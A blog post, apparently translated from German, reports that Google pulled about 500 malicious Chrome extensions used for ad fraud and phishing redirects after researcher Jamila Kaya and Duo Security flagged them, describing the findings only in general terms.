[German]Google has removed 500 malicious extensions for the Chrome browser from its web store after security researchers issued a warning. Here are some details what I know so far.
Advertising
In the past I have also reported for Chrome browser extensions. But now I am a proponent of 'less is more', too often I had to report about compromised Android apps or browser extensions. In my blogs I try to minimize the number of used WordPress plugins, in browsers there are no extensions at all – and if I need something, they are only activated for the time of use.
Google pulls 500 malicious Chrome extensions after researcher tip-off https://t.co/jdp3WOgSiq
— Naked Security (@NakedSecurity) February 17, 2020
Through the above tweet I became aware of a new case documented by Sophos security researchers. It was discovered by security researcher Jamila Kaya, who used Duo Security's CRXcavator tool (also available on CRXcavator.io) to investigate a handful of suspicious chrome extensions. The extensions were mostly around marketing and advertising.
First indication: Code in extensions is equal
When she had a first suspicion, she started an analysis. While tracking down some questionable extensions, she noticed that the extension code often looked like a copy of the code of other Chrome extensions, although small changes in the names of internal functions were intended to hide this. Another disturbing similarity was the number of permissions requested. The permissions allowed the extensions to gain access to surfers' browsing data and to allow the extension to run when visiting websites with HTTPS.
A whole collection of suspicious extensions
In cooperation with Duo Security, the security researcher finally identified 70 extensions that seemed to be related to each other. All of them also contacted similar command and control networks and seemed to be designed to detect and counteract a sandbox analysis.
Advertising
The extension aimed at advertising fraud – whereby domains were contacted without the users' knowledge. And there was a redirection of users to malware and phishing domains. Many of these extensions for the Chrome browser were available from the store for almost a year, some of which have been proven to have been around for much longer.
Google removes the extensions
After Google was contacted by the security researcher, the 500 extensions all flew out of the store. Apparently, Google identified over 70 extensions originally reported as unwanted. After the discovery, the company updated its recognition signatures. Google writes about this:
We regularly scan the store to find extensions with similar techniques, code, and behavior, and we remove those extensions if they violate our policies.
But in this particular case, these mechanisms may have failed. Google's Chrome web shop has about 190,000 extensions, which puts the 500 now removed dubious extensions into perspective. A report from Extension Monitor last August estimated that three-quarters of the 190,000 extensions had between zero and a handful of installations. The extensions discovered by Duo Security and Kaya had been installed a total of 1.7 million times. Anyone who likes to use such browser extensions should make sure not to fall for such obscure providers.
Advertising
